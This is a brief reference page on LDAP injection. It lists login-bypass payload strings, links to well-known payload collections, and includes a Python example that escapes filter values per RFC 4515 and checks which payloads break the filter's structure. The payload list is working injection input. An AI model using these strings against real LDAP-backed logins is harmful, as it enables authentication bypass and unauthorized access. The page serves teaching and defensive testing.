LDAP Injection

LDAP injection is an attack against web-based applications that construct LDAP statements from user input. When an application fails to properly sanitize that input, it is possible to modify the LDAP statements using a local proxy.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection

https://book.hacktricks.xyz/pentesting-web/ldap-injection

- Login Bypass

https://book.hacktricks.xyz/pentesting-web/ldap-injection#login-bypass

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
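The mitigation side of the list above, as an added example that is not taken from the linked references: user-field values from the list are placed into a login filter by plain concatenation and then with RFC 4515 value escaping, and a structural check shows which filters keep their intended shape. The filter template, the attribute names `uid` and `userPassword`, and the helper names are assumptions for illustration.

```python
# Added example: naive filter concatenation vs. RFC 4515 value escaping.
# Attribute names and the filter template are assumed, not from the page.

# Characters RFC 4515 requires to be escaped inside an assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# User-field inputs from the Login Bypass list; "%00" is shown URL-decoded.
PAYLOADS = ["*", "*)(&", "*)(|(&", "*)(|(*", "*))\x00",
            "admin)(&)", "admin)(!(&(|", "admin))(|(|"]


def escape_filter_value(value: str) -> str:
    """Return value with every filter metacharacter replaced by \\XX."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(user: str, pwd: str) -> str:
    """Vulnerable pattern: input is pasted into the filter verbatim."""
    return f"(&(uid={user})(userPassword={pwd}))"


def build_filter_safe(user: str, pwd: str) -> str:
    """Hardened pattern: both values are escaped before substitution."""
    return (f"(&(uid={escape_filter_value(user)})"
            f"(userPassword={escape_filter_value(pwd)}))")


def keeps_shape(ldap_filter: str) -> bool:
    """True if the filter is still one AND of two terms with no wildcard.

    The template contributes exactly three '(' and three ')'. Any extra raw
    parenthesis, '*' or NUL means input changed the filter structure.
    """
    return (ldap_filter.count("(") == 3 and ldap_filter.count(")") == 3
            and "*" not in ldap_filter and "\x00" not in ldap_filter)


def audit(payloads=PAYLOADS, pwd="pwd"):
    """Return (payload, unsafe_ok, safe_ok) for each input."""
    return [(p, keeps_shape(build_filter_unsafe(p, pwd)),
             keeps_shape(build_filter_safe(p, pwd))) for p in payloads]


if __name__ == "__main__":
    for payload, unsafe_ok, safe_ok in audit():
        print(f"{payload!r:18} unsafe intact={unsafe_ok}  escaped intact={safe_ok}")
```

This escaping applies to filter assertion values only; input placed into a distinguished name needs the separate RFC 4514 escaping rules.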

- Fuzzing

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt
